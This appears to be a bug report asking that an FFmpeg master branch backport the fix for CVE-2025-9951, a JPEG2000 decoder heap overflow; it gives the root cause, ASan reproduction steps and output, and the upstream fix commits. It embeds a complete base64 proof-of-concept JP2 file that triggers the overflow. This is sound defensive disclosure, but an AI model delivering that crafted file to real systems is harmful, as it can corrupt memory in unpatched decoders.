master (FFmpeg 7.1.1 base) is still affected by CVE-2025-9951, a heap buffer overflow in the JPEG2000 decoder. It was fixed upstream in August 2025 but the fix hasn't been pulled in here yet.
Affected
master, ffmpeg version 7.1.1libavcodec/jpeg2000dec.c, write_frame_8()- CVE-2025-9951 (GHSA-39q3-f8jq-v6mg)
Root cause
A JPEG2000 cdef box can remap a component onto an arbitrary plane. WRITE_FRAME uses s->cdef[compno] - 1 as the destination plane index without checking it against the actual plane dimensions, so a crafted file can write a larger plane's data into a smaller plane's buffer.
Reproduction
Build with AddressSanitizer (--toolchain=clang-asan or --enable-debug --extra-cflags=-fsanitize=address --extra-ldflags=-fsanitize=address) and decode the attached 381-byte poc.jp2:
ffmpeg -i poc.jp2 -f null -
==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x53100001084f
WRITE of size 1 at 0x53100001084f thread T1
#0 write_frame_8 libavcodec/jpeg2000dec.c:2337
#1 jpeg2000_decode_tile libavcodec/jpeg2000dec.c:2358
#3 jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2867
SUMMARY: AddressSanitizer: heap-buffer-overflow libavcodec/jpeg2000dec.c:2337 in write_frame_8
PoC (381 bytes, base64):
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABJanAyaAAAABZpaGRyAAACAAAAAgAAAwcHAAAAAAAPY29scgEAAAAAABIAAAAcY2RlZgADAAAAAAACAAEAAAABAAIAAAADAAABFGpwMmP/T/9RAC8AAAAAAgAAAAIAAAAAAAAAAAAAAAEAAAABAAAAAAAAAAAAAAMHAQEHAgIHAgL/UgAMAAAAAQAGAgIAAP9cACkifyB+4H7gfqB28HbwdsBvAG8AbuBnUGdQZ2hQBVAFUEdX01fTV2L/ZAAQAAFMYXZjNjAuMy4xMDD/kAAKAAAAAAAjAAH/kwAAAAAAAAAAAAAAAAAAAAAAAAAAAP+QAAoAAQAAACMAAf+TAAAAAAAAAAAAAAAAAAAAAAAAAAAA/5AACgACAAAAIwAB/5MAAAAAAAAAAAAAAAAAAAAAAAAAAAD/kAAKAAMAAAAjAAH/kwAAAAAAAAAAAAAAAAAAAAAAAAAAAP/Z
Fix
Upstream resolved this with two commits:
104d6846c1be avcodec/jpeg2000dec: move cdef default check into get_siz()01a292c7e365 avcodec/jpeg2000dec: implement cdef remapping during pixel format matching
Cherry-picking both onto master stops the overflow. PR with the backport to follow.
master(FFmpeg 7.1.1 base) is still affected by CVE-2025-9951, a heap buffer overflow in the JPEG2000 decoder. It was fixed upstream in August 2025 but the fix hasn't been pulled in here yet.Affected
master,ffmpeg version 7.1.1libavcodec/jpeg2000dec.c,write_frame_8()Root cause
A JPEG2000
cdefbox can remap a component onto an arbitrary plane.WRITE_FRAMEusess->cdef[compno] - 1as the destination plane index without checking it against the actual plane dimensions, so a crafted file can write a larger plane's data into a smaller plane's buffer.Reproduction
Build with AddressSanitizer (
--toolchain=clang-asanor--enable-debug --extra-cflags=-fsanitize=address --extra-ldflags=-fsanitize=address) and decode the attached 381-bytepoc.jp2:PoC (381 bytes, base64):
Fix
Upstream resolved this with two commits:
104d6846c1beavcodec/jpeg2000dec: move cdef default check into get_siz()01a292c7e365avcodec/jpeg2000dec: implement cdef remapping during pixel format matchingCherry-picking both onto
masterstops the overflow. PR with the backport to follow.